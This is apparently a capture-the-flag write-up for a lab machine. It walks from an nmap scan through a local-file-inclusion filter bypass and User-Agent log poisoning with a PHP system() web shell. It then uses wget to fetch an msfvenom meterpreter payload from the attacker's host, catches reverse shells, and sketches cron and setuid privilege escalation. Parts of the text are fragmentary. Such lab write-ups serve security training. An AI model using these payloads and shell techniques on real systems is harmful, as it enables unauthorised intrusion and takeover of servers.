# Nmap 7.91 scan initiated Mon May 10 10:54:40 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.67.93 Nmap scan report for 10.10.67.93 Host is up (0.070s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA) | 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA) |_ 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Wavefire Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 10 10:57:17 2021 -- 1 IP address (1 host up) scanned in 156.44 seconds
We get the following base64 string: PD9waHAgZWNobyAnQ29udHJvbCBpcyBhbiBpbGx1c2lvbic7ID8+Cg==
that decodes to <?php echo 'Control is an illusion'; ?>\n.
Let's try it on test.php.
echo'Sorry, Thats not allowed'; } } ?> </div> </body>
</html>
The code is checking that the path we provide contains /var/www/html/development_testing
and does not include any ../.. to avoid path traversal. But it's bypassable.
One easy way to do that is to the neutral add ./ between each ../.. so it
becomes .././.. that effectively bypass the filter.
The full URL to read /etc/passwd would be:
PS: We are not forced to use the base64 for text files, we only need it for PHP files. And we'ill need it off for the inclusion to work.
The log will contain the URL path and the User-Agent so we can poison the User-Agent.
1
$ curl http://mafialive.thm/ -A "<?php system(\$_GET['cmd']); ?>"
PS: The logs will escape double quotes so use single quotes for strings in the PHP payload, but since we use double quotes for the argument we'll have to escape the dollar symbol so it won't be interpreted by the shell.
The we can include the logs again and add &cmd=id to execute a command.
Note: at some point just reset the box, since you fuzzed in the previous steps the logs will be too long.
We can see the command result has replaced the PHP payload:
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.19.77 LPORT=9999 -f raw > agent.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 34277 bytes
The start a HTTP server to serve the file:
1 2 3 4
$ ruby -run -e httpd . -p 8888 [2021-05-10 12:06:29] INFO WEBrick 1.7.0 [2021-05-10 12:06:29] INFO ruby 3.0.1 (2021-04-05) [x86_64-linux] [2021-05-10 12:06:29] INFO WEBrick::HTTPServer#start: pid=55053 port=8888
Then we request the log file with cmd=wget http://10.9.19.77:8888/agent.php.
Name Current Setting Required Description ---- --------------- -------- -----------
Payload options (php/meterpreter_reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.9.19.77 yes The listen address (an interface may be specified) LPORT 9999 yes The listen port
Exploit target:
Id Name -- ---- 0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.9.19.77:9999
Elevation of Privilege (EoP): from www-data to archangel#
There is a cronjob calling a custom script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
Then we start a listener and wait for the incoming connection:
1 2 3 4 5 6 7 8
pwncat -lvv 8888 INFO: Listening on :::8888 (family 10/IPv6, TCP) INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP) INFO: Client connected from 10.10.244.190:55584 (family 2/IPv4, TCP) bash: cannot set terminal process group (1059): Inappropriate ioctl for device bash: no job control in this shell archangel@ubuntu:~$ id uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
Elevation of Privilege (EoP): from archangel to root#
Now we are logged as archangel we can read the secret folder:
1 2 3 4 5 6 7 8 9 10
archangel@ubuntu:~$ ls -lh secret total 24K -rwsr-xr-x 1 root root 17K Nov 18 16:40 backup -rw-r--r-- 1 root root 49 Nov 19 20:41 user2.txt
Seems there is a setuid so that archangel can write to /opt but the cp
binary is called with a relative name instead of the absolute path so we can
make it called a controlled one.